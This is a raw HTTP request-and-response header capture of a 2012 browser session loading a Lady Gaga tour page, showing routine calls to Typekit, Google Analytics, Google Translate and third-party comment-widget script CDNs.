HTTP/1.1 200 OK

Content-Type: text/css;charset=utf-8
Content-Encoding: gzip
Accept-Ranges: bytes
Cache-Control: public, max-age=604800
Date: Mon, 05 Nov 2012 19:02:03 GMT
Last-Modified: Thu, 01 Nov 2012 18:17:52 GMT
Server: ECS (arn/46E4)
Status: 200 OK
Vary: Accept-Encoding
X-Cache: HIT
Content-Length: 265791
GET /p.gif?s=1&k=mxd3gmg&ht=tk&h=www.ladygaga.com&f=1817.632.635.634.631.637.630.636.633.762.761.6364.6365&a=163479&_=1352142125855 HTTP/1.1

Host: p.typekit.net
GET /p.gif?s=1&amp;k=mxd3gmg&amp;ht=tk&amp;h=www.ladygaga.com&amp;f=1817.632.635.634.631.637.630.636.633.762.761.6364.6365&amp;a=163479&amp;_=1352142125855 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: image/gif
Accept-Ranges: bytes
Cache-Control: max-age=604800
Date: Mon, 05 Nov 2012 19:02:05 GMT
Expires: Mon, 12 Nov 2012 19:02:05 GMT
Last-Modified: Tue, 31 Jul 2012 23:01:31 GMT
Server: ECS (arn/46E4)
X-Cache: HIT
Content-Length: 35
GET /clientapps/v2/backplane.js HTTP/1.1

Host: cdn.echoenabled.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/javascript
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Cache-Control: max-age=86400
Age: 39983
Date: Mon, 05 Nov 2012 19:02:05 GMT
Last-Modified: Thu, 01 Nov 2012 07:52:57 GMT
Expires: Tue, 06 Nov 2012 07:55:42 GMT
Content-Length: 2935
Connection: keep-alive
GET /p.gif?s=1&k=mxd3gmg&ht=tk&h=www.ladygaga.com&f=1817.632.635.634.631.637.630.636.633.762.761.6364.6365&a=163479&_=1352142126169 HTTP/1.1

Host: p.typekit.net
GET /p.gif?s=1&amp;k=mxd3gmg&amp;ht=tk&amp;h=www.ladygaga.com&amp;f=1817.632.635.634.631.637.630.636.633.762.761.6364.6365&amp;a=163479&amp;_=1352142126169 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: image/gif
Accept-Ranges: bytes
Cache-Control: max-age=604800
Date: Mon, 05 Nov 2012 19:02:06 GMT
Expires: Mon, 12 Nov 2012 19:02:06 GMT
Last-Modified: Tue, 31 Jul 2012 23:01:31 GMT
Server: ECS (arn/46E4)
X-Cache: HIT
Content-Length: 35
GET /p.gif?s=1&k=mxd3gmg&ht=tk&h=www.ladygaga.com&f=1817.632.635.634.631.637.630.636.633.762.761.6364.6365&a=163479&_=1352142126230 HTTP/1.1

Host: p.typekit.net
GET /p.gif?s=1&amp;k=mxd3gmg&amp;ht=tk&amp;h=www.ladygaga.com&amp;f=1817.632.635.634.631.637.630.636.633.762.761.6364.6365&amp;a=163479&amp;_=1352142126230 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: image/gif
Accept-Ranges: bytes
Cache-Control: max-age=604800
Date: Mon, 05 Nov 2012 19:02:06 GMT
Expires: Mon, 12 Nov 2012 19:02:06 GMT
Last-Modified: Tue, 31 Jul 2012 23:01:31 GMT
Server: ECS (arn/46E4)
X-Cache: HIT
Content-Length: 35
GET /__utm.gif?utmwv=5.3.7&utms=2&utmn=507730259&utmhn=www.ladygaga.com&utmcs=UTF-8&utmsr=1176x885&utmvp=15x15&utmsc=24-bit&utmul=en-us&utmje=1&utmfl=10.0%20r45&utmdt=LADY%20GAGA%20%7C%20BORN%20THIS%20WAY%20BALL&utmhid=1907287699&utmr=http%3A%2F%2Fwww.frozen-backside.de%2Findex.php%3Fpage%3DIndex&utmp=%2Fbornthiswayball%2F&utmac=UA-1162848-67&utmcc=__utma%3D70702477.1916483056.1352142125.1352142125.1352142125.1%3B%2B__utmz%3D70702477.1352142125.1.1.utmcsr%3Dfrozen-backside.de%7Cutmccn%3D(referral)%7Cutmcmd%3Dreferral%7Cutmcct%3D%2Findex.php%3B&utmu=q~ HTTP/1.1

Host: www.google-analytics.com
GET /__utm.gif?utmwv=5.3.7&amp;utms=2&amp;utmn=507730259&amp;utmhn=www.ladygaga.com&amp;utmcs=UTF-8&amp;utmsr=1176x885&amp;utmvp=15x15&amp;utmsc=24-bit&amp;utmul=en-us&amp;utmje=1&amp;utmfl=10.0%20r45&amp;utmdt=LADY%20GAGA%20%7C%20BORN%20THIS%20WAY%20BALL&amp;utmhid=1907287699&amp;utmr=http%3A%2F%2Fwww.frozen-backside.de%2Findex.php%3Fpage%3DIndex&amp;utmp=%2Fbornthiswayball%2F&amp;utmac=UA-1162848-67&amp;utmcc=__utma%3D70702477.1916483056.1352142125.1352142125.1352142125.1%3B%2B__utmz%3D70702477.1352142125.1.1.utmcsr%3Dfrozen-backside.de%7Cutmccn%3D(referral)%7Cutmcmd%3Dreferral%7Cutmcct%3D%2Findex.php%3B&amp;utmu=q~ HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Thu, 01 Nov 2012 01:21:39 GMT
Content-Length: 35
X-Content-Type-Options: nosniff
Pragma: no-cache
Expires: Wed, 19 Apr 2000 11:43:00 GMT
Last-Modified: Wed, 21 Jan 2004 19:51:30 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Age: 409227
Server: GFE/2.0
GET /translate_a/element.js?cb=googleTranslateElementInit HTTP/1.1

Host: translate.google.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
Cookie: PREF=ID=18d07d2c5ecbbb08:U=205ee10a10512bfa:FF=0:TM=1350344350:LM=1350344627:S=oVTvNjgbzbFNBNUF; NID=64=UOjfkeau7k9dzmFvAsFwVqmD4s7g_bdUMaEnGOlKRSTKCit3R_G5xg2kMKTOgRf2IL0DzvimBbfFpj1mIHK6cKNk76wCsEyOlULvzyFq8aklSyHHGXGPdMpqcZCr8LfK
HTTP/1.1 200 OK

Content-Type: text/javascript; charset=UTF-8
Date: Mon, 05 Nov 2012 19:02:06 GMT
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Language: en
Pragma: no-cache
X-Content-Type-Options: nosniff
Content-Disposition: attachment
Content-Encoding: gzip
Server: HTTP server (unknown)
Content-Length: 702
X-XSS-Protection: 1; mode=block
GET /libs/v1/trendingposts/trendingposts.js HTTP/1.1

Host: cdn.realtidbits.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Mon, 08 Oct 2012 14:36:11 GMT
Etag: 79e85f49b554f87cc40c5ad897d4de11
Vary: Accept-Encoding
X-Trans-Id: tx951f72ea99e740e5a4a664bd2a53d890
X-Timestamp: 1349706971.85098
X-Object-Meta-X-Object-Meta-Cb-Modifiedtime: Wed, 03 Aug 2011 15:58:04 GMT
Accept-Ranges: bytes
Content-Encoding: gzip
Content-Length: 2142
Cache-Control: public, max-age=601
Expires: Mon, 05 Nov 2012 19:12:07 GMT
Date: Mon, 05 Nov 2012 19:02:06 GMT
Connection: keep-alive
GET /libs/v1/UpdateSort/UpdateSort2.js HTTP/1.1

Host: cdn.realtidbits.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Mon, 08 Oct 2012 14:36:08 GMT
Etag: f0812cfab19c08bcc826c01015b96b8e
Vary: Accept-Encoding
X-Trans-Id: tx481ae10981134de0bfbdfc6ff6c4af43
X-Timestamp: 1349706968.45941
X-Object-Meta-X-Object-Meta-Cb-Modifiedtime: Mon, 25 Jun 2012 20:37:55 GMT
Accept-Ranges: bytes
Content-Encoding: gzip
Content-Length: 590
Cache-Control: public, max-age=228
Expires: Mon, 05 Nov 2012 19:05:54 GMT
Date: Mon, 05 Nov 2012 19:02:06 GMT
Connection: keep-alive
GET /clientapps/v2/submit.js HTTP/1.1

Host: cdn.echoenabled.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/javascript
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Cache-Control: max-age=86400
Age: 39984
Date: Mon, 05 Nov 2012 19:02:06 GMT
Last-Modified: Thu, 01 Nov 2012 07:52:57 GMT
Expires: Tue, 06 Nov 2012 07:55:42 GMT
Content-Length: 18717
Connection: keep-alive
GET /libs/v1/analytics/analytics.js HTTP/1.1

Host: cdn.realtidbits.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Mon, 08 Oct 2012 14:40:13 GMT
Etag: bc20a8d63763854db8067f9c7a2a0f08
Vary: Accept-Encoding
X-Timestamp: 1349707213.66073
X-Object-Meta-X-Object-Meta-Cb-Modifiedtime: Fri, 28 Sep 2012 14:56:50 GMT
Accept-Ranges: bytes
X-Trans-Id: tx696152b3b2e6492fbd58bce77f09c2fb
Content-Encoding: gzip
Content-Length: 3196
Cache-Control: public, max-age=753
Expires: Mon, 05 Nov 2012 19:14:39 GMT
Date: Mon, 05 Nov 2012 19:02:06 GMT
Connection: keep-alive
GET /libs/v1/forum/jquery-ui-1.8.8.custom.min.js HTTP/1.1

Host: cdn.realtidbits.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Mon, 08 Oct 2012 14:38:03 GMT
Etag: 58ba17e3a3375e4fb49b7762fd53bd18
Vary: Accept-Encoding
X-Trans-Id: tx7be3b1865dc44b66935c0c08ce42d945
X-Timestamp: 1349707083.38558
X-Object-Meta-X-Object-Meta-Cb-Modifiedtime: Fri, 10 Feb 2012 17:50:28 GMT
Accept-Ranges: bytes
Content-Encoding: gzip
Content-Length: 15838
Cache-Control: public, max-age=633
Expires: Mon, 05 Nov 2012 19:12:39 GMT
Date: Mon, 05 Nov 2012 19:02:06 GMT
Connection: keep-alive
GET /libs/v1/forum/jquery.ba-hashchange.min.js HTTP/1.1

Host: cdn.realtidbits.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Mon, 08 Oct 2012 14:38:04 GMT
Etag: 5cdc6165b5488bcd11ccafc74cd6e235
Vary: Accept-Encoding
X-Timestamp: 1349707084.15363
X-Object-Meta-X-Object-Meta-Cb-Modifiedtime: Fri, 10 Feb 2012 17:50:28 GMT
Accept-Ranges: bytes
X-Trans-Id: tx9f8a7ab097c346b38b8d93659840afcb
Content-Encoding: gzip
Content-Length: 856
Cache-Control: public, max-age=175
Expires: Mon, 05 Nov 2012 19:05:01 GMT
Date: Mon, 05 Nov 2012 19:02:06 GMT
Connection: keep-alive
GET /libs/v1/CustomReorder/CustomReorder.js HTTP/1.1

Host: cdn.realtidbits.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Mon, 08 Oct 2012 14:39:29 GMT
Etag: 6098cb196dd25d3da5c58263c016fbb3
Vary: Accept-Encoding
X-Trans-Id: txbe83af8c4f87405caf8eda18536f6c50
X-Timestamp: 1349707169.81449
X-Object-Meta-X-Object-Meta-Cb-Modifiedtime: Wed, 09 May 2012 22:33:01 GMT
Accept-Ranges: bytes
Content-Encoding: gzip
Content-Length: 2839
Cache-Control: public, max-age=577
Expires: Mon, 05 Nov 2012 19:11:43 GMT
Date: Mon, 05 Nov 2012 19:02:06 GMT
Connection: keep-alive
GET /clientapps/v2/stream.js HTTP/1.1

Host: cdn.echoenabled.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/javascript
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Cache-Control: max-age=86400
Age: 39982
Date: Mon, 05 Nov 2012 19:02:06 GMT
Last-Modified: Thu, 01 Nov 2012 07:52:57 GMT
Expires: Tue, 06 Nov 2012 07:55:44 GMT
Content-Length: 34369
Connection: keep-alive
GET /libs/v1/HoverCard/HoverCard.js HTTP/1.1

Host: cdn.realtidbits.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Mon, 08 Oct 2012 14:37:28 GMT
Etag: be60e819c79c04116309ad0a92def299
Vary: Accept-Encoding
X-Trans-Id: tx43c8621a50b14f9f8979bfa0840999fd
X-Timestamp: 1349707048.27014
X-Object-Meta-X-Object-Meta-Cb-Modifiedtime: Fri, 18 May 2012 16:17:01 GMT
Accept-Ranges: bytes
Content-Encoding: gzip
Content-Length: 16252
Cache-Control: public, max-age=130
Expires: Mon, 05 Nov 2012 19:04:17 GMT
Date: Mon, 05 Nov 2012 19:02:07 GMT
Connection: keep-alive
GET /libs/v1/EMBSubscription/EMBSubscription.js HTTP/1.1

Host: cdn.realtidbits.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Mon, 08 Oct 2012 14:39:25 GMT
Etag: 2e170a9195e064b54fdd986ff58189d1
Vary: Accept-Encoding
X-Timestamp: 1349707165.69901
X-Object-Meta-X-Object-Meta-Cb-Modifiedtime: Wed, 29 Aug 2012 15:27:31 GMT
Accept-Ranges: bytes
X-Trans-Id: tx1e5a183f873f4858a6a73b095794d937
Content-Encoding: gzip
Content-Length: 3849
Cache-Control: public, max-age=178
Expires: Mon, 05 Nov 2012 19:05:05 GMT
Date: Mon, 05 Nov 2012 19:02:07 GMT
Connection: keep-alive
GET /clientapps/v2/plugins/form-auth.js HTTP/1.1

Host: cdn.echoenabled.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/javascript
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Cache-Control: max-age=86400
Age: 39983
Date: Mon, 05 Nov 2012 19:02:07 GMT
Last-Modified: Thu, 01 Nov 2012 07:53:11 GMT
Expires: Tue, 06 Nov 2012 07:55:44 GMT
Content-Length: 1590
Connection: keep-alive
GET /__utm.gif?utmwv=5.3.7&utms=3&utmn=416414222&utmhn=www.ladygaga.com&utmcs=UTF-8&utmsr=1176x885&utmvp=15x15&utmsc=24-bit&utmul=en-us&utmje=1&utmfl=10.0%20r45&utmdt=LADY%20GAGA%20%7C%20BORN%20THIS%20WAY%20BALL&utmhid=1080193262&utmr=http%3A%2F%2Fwww.frozen-backside.de%2Findex.php%3Fpage%3DIndex&utmp=%2Fbornthiswayball%2F&utmac=UA-1162848-67&utmcc=__utma%3D70702477.1916483056.1352142125.1352142125.1352142125.1%3B%2B__utmz%3D70702477.1352142125.1.1.utmcsr%3Dfrozen-backside.de%7Cutmccn%3D(referral)%7Cutmcmd%3Dreferral%7Cutmcct%3D%2Findex.php%3B&utmu=q~ HTTP/1.1

Host: www.google-analytics.com
GET /__utm.gif?utmwv=5.3.7&amp;utms=3&amp;utmn=416414222&amp;utmhn=www.ladygaga.com&amp;utmcs=UTF-8&amp;utmsr=1176x885&amp;utmvp=15x15&amp;utmsc=24-bit&amp;utmul=en-us&amp;utmje=1&amp;utmfl=10.0%20r45&amp;utmdt=LADY%20GAGA%20%7C%20BORN%20THIS%20WAY%20BALL&amp;utmhid=1080193262&amp;utmr=http%3A%2F%2Fwww.frozen-backside.de%2Findex.php%3Fpage%3DIndex&amp;utmp=%2Fbornthiswayball%2F&amp;utmac=UA-1162848-67&amp;utmcc=__utma%3D70702477.1916483056.1352142125.1352142125.1352142125.1%3B%2B__utmz%3D70702477.1352142125.1.1.utmcsr%3Dfrozen-backside.de%7Cutmccn%3D(referral)%7Cutmcmd%3Dreferral%7Cutmcct%3D%2Findex.php%3B&amp;utmu=q~ HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Thu, 01 Nov 2012 01:21:39 GMT
Content-Length: 35
X-Content-Type-Options: nosniff
Pragma: no-cache
Expires: Wed, 19 Apr 2000 11:43:00 GMT
Last-Modified: Wed, 21 Jan 2004 19:51:30 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Age: 409228
Server: GFE/2.0
GET /libs/v1/lscache.js HTTP/1.1

Host: cdn.realtidbits.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Mon, 08 Oct 2012 14:37:14 GMT
Etag: 70cfc2962bcfe3c1fe6fc737ca39617a
Vary: Accept-Encoding
X-Trans-Id: txa65ddd09cb434ccc96d12fd353ddc2dd
X-Timestamp: 1349707034.27910
X-Object-Meta-X-Object-Meta-Cb-Modifiedtime: Fri, 20 Jan 2012 20:50:36 GMT
Accept-Ranges: bytes
Content-Encoding: gzip
Content-Length: 2086
Cache-Control: public, max-age=192
Expires: Mon, 05 Nov 2012 19:05:19 GMT
Date: Mon, 05 Nov 2012 19:02:07 GMT
Connection: keep-alive
GET /libs/v1/sonar.polls.js HTTP/1.1

Host: cdn.realtidbits.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Mon, 08 Oct 2012 14:36:14 GMT
Etag: 12ecde4ff8d73ad3260da86b2fcb3dc7
Vary: Accept-Encoding
X-Trans-Id: tx923e46e1080b4717b7acc28dbc807eff
X-N: S
X-Timestamp: 1349706974.67392
X-Object-Meta-X-Object-Meta-Cb-Modifiedtime: Mon, 01 Oct 2012 14:33:07 GMT
Accept-Ranges: bytes
Content-Encoding: gzip
Content-Length: 7008
Cache-Control: public, max-age=522
Expires: Mon, 05 Nov 2012 19:10:49 GMT
Date: Mon, 05 Nov 2012 19:02:07 GMT
Connection: keep-alive
GET /libs/v1/ugcpoll.js HTTP/1.1

Host: cdn.realtidbits.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Mon, 08 Oct 2012 14:36:09 GMT
Etag: 36a342b951cabe24c724bc02942fe38b
Vary: Accept-Encoding
X-Trans-Id: tx41490a99514042aab35594ad590b5d90
X-Timestamp: 1349706969.94147
X-Object-Meta-X-Object-Meta-Cb-Modifiedtime: Wed, 26 Sep 2012 19:50:49 GMT
Accept-Ranges: bytes
Content-Encoding: gzip
Content-Length: 3266
Cache-Control: public, max-age=712
Expires: Mon, 05 Nov 2012 19:13:59 GMT
Date: Mon, 05 Nov 2012 19:02:07 GMT
Connection: keep-alive
GET /libs/v1/forum/localization/en.js HTTP/1.1

Host: cdn.realtidbits.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Mon, 08 Oct 2012 14:38:01 GMT
Etag: 220d7275783822637eda89e4fc7bcd46
Vary: Accept-Encoding
X-Trans-Id: tx828c593f26004e5fa2f0f933c27596f8
X-Timestamp: 1347849517.27825
X-Object-Meta-X-Object-Meta-Cb-Modifiedtime: Mon, 27 Aug 2012 17:35:21 GMT
Accept-Ranges: bytes
Content-Encoding: gzip
Content-Length: 2139
Cache-Control: public, max-age=225
Expires: Mon, 05 Nov 2012 19:05:52 GMT
Date: Mon, 05 Nov 2012 19:02:07 GMT
Connection: keep-alive
GET /libs/v1/forum/bumptopic.js HTTP/1.1

Host: cdn.realtidbits.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Mon, 08 Oct 2012 14:38:40 GMT
Etag: 28a49cd847eef74e589fdd86efa01053
Vary: Accept-Encoding
X-Trans-Id: tx24fb7c3742a146a0bd2502950c855c4c
X-Timestamp: 1349707120.97977
X-Object-Meta-X-Object-Meta-Cb-Modifiedtime: Mon, 24 Sep 2012 19:17:21 GMT
Accept-Ranges: bytes
Content-Encoding: gzip
Content-Length: 518
Cache-Control: public, max-age=523
Expires: Mon, 05 Nov 2012 19:10:50 GMT
Date: Mon, 05 Nov 2012 19:02:07 GMT
Connection: keep-alive
GET /clientapps/v2/plugins/reply.js HTTP/1.1

Host: cdn.echoenabled.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/javascript
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Cache-Control: max-age=86400
Age: 39982
Date: Mon, 05 Nov 2012 19:02:07 GMT
Last-Modified: Thu, 01 Nov 2012 07:53:09 GMT
Expires: Tue, 06 Nov 2012 07:55:45 GMT
Content-Length: 2160
Connection: keep-alive
GET /clientapps/v2/counter.js HTTP/1.1

Host: cdn.echoenabled.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/javascript
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Cache-Control: max-age=86400
Age: 39985
Date: Mon, 05 Nov 2012 19:02:07 GMT
Last-Modified: Thu, 01 Nov 2012 07:52:56 GMT
Expires: Tue, 06 Nov 2012 07:55:42 GMT
Content-Length: 12474
Connection: keep-alive
